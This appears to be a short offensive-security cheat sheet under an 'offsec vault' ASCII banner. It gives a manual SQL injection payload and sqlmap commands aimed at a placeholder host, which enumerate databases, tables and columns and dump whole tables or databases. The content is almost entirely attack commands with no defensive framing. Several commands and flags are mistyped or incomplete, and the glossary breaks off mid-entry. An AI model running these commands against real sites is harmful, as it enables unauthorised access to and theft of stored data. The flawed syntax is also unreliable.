▒█████ █████▒ █████▒ ██████ ▓█████ ▄████▄ ██▒ █▓ ▄▄▄ █ ██ ██▓ ▄▄▄█████▓
▒██▒ ██▒▓██ ▒▓██ ▒▒██ ▒ ▓█ ▀ ▒██▀ ▀█▓██░ █▒▒████▄ ██ ▓██▒▓██▒ ▓ ██▒ ▓▒
▒██░ ██▒▒████ ░▒████ ░░ ▓██▄ ▒███ ▒▓█ ▄▓██ █▒░▒██ ▀█▄ ▓██ ▒██░▒██░ ▒ ▓██░ ▒░
▒██ ██░░▓█▒ ░░▓█▒ ░ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒▒██ █░░░██▄▄▄▄██ ▓▓█ ░██░▒██░ ░ ▓██▓ ░
░ ████▓▒░░▒█░ ░▒█░ ▒██████▒▒░▒████▒▒ ▓███▀ ░ ▒▀█░ ▓█ ▓██▒▒▒█████▓ ░██████▒▒██▒ ░
░ ▒░▒░▒░ ▒ ░ ▒ ░ ▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░ ░ ▐░ ▒▒ ▓▒█░░▒▓▒ ▒ ▒ ░ ▒░▓ ░▒ ░░
░ ▒ ▒░ ░ ░ ░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░░ ▒ ▒▒ ░░░▒░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ░░░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░
░ ░
SQLmap Usage
normal manual testing
flags:
' or 1=1;--
"
sqlmap automate
::: normal database discovery
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" --form -dbs --batch
::: database discovery
# sql -u "http://offsecvault/log4j.php?log4j=1" --form -D [databasename] -a --batch
::: table discovery
# sql -u "http://offsecvault/log4j.php?log4j=1" --form -D [databasename] -a --table --batch
::: find columns
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" -D [databasename] -T
--columns --batch
::: dump the table
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" -D [databasename] -T --dump --batch
::: dump database
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" -D [databasename] --dump-all --batch
::: database cookie attempt
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" --cookie="value" --dbs
flags:
-u = URL
--all or -a = retrieve everything
--form = parse and test forms on target URL
--dbs = enumerate dbms databases
--batch = never ask for user input, default behavior selected
--D = DBMS database to enumerate
--T = DBMS database table(s) to enumerate
--C = DBMS database table column(s) to enumerate
--table =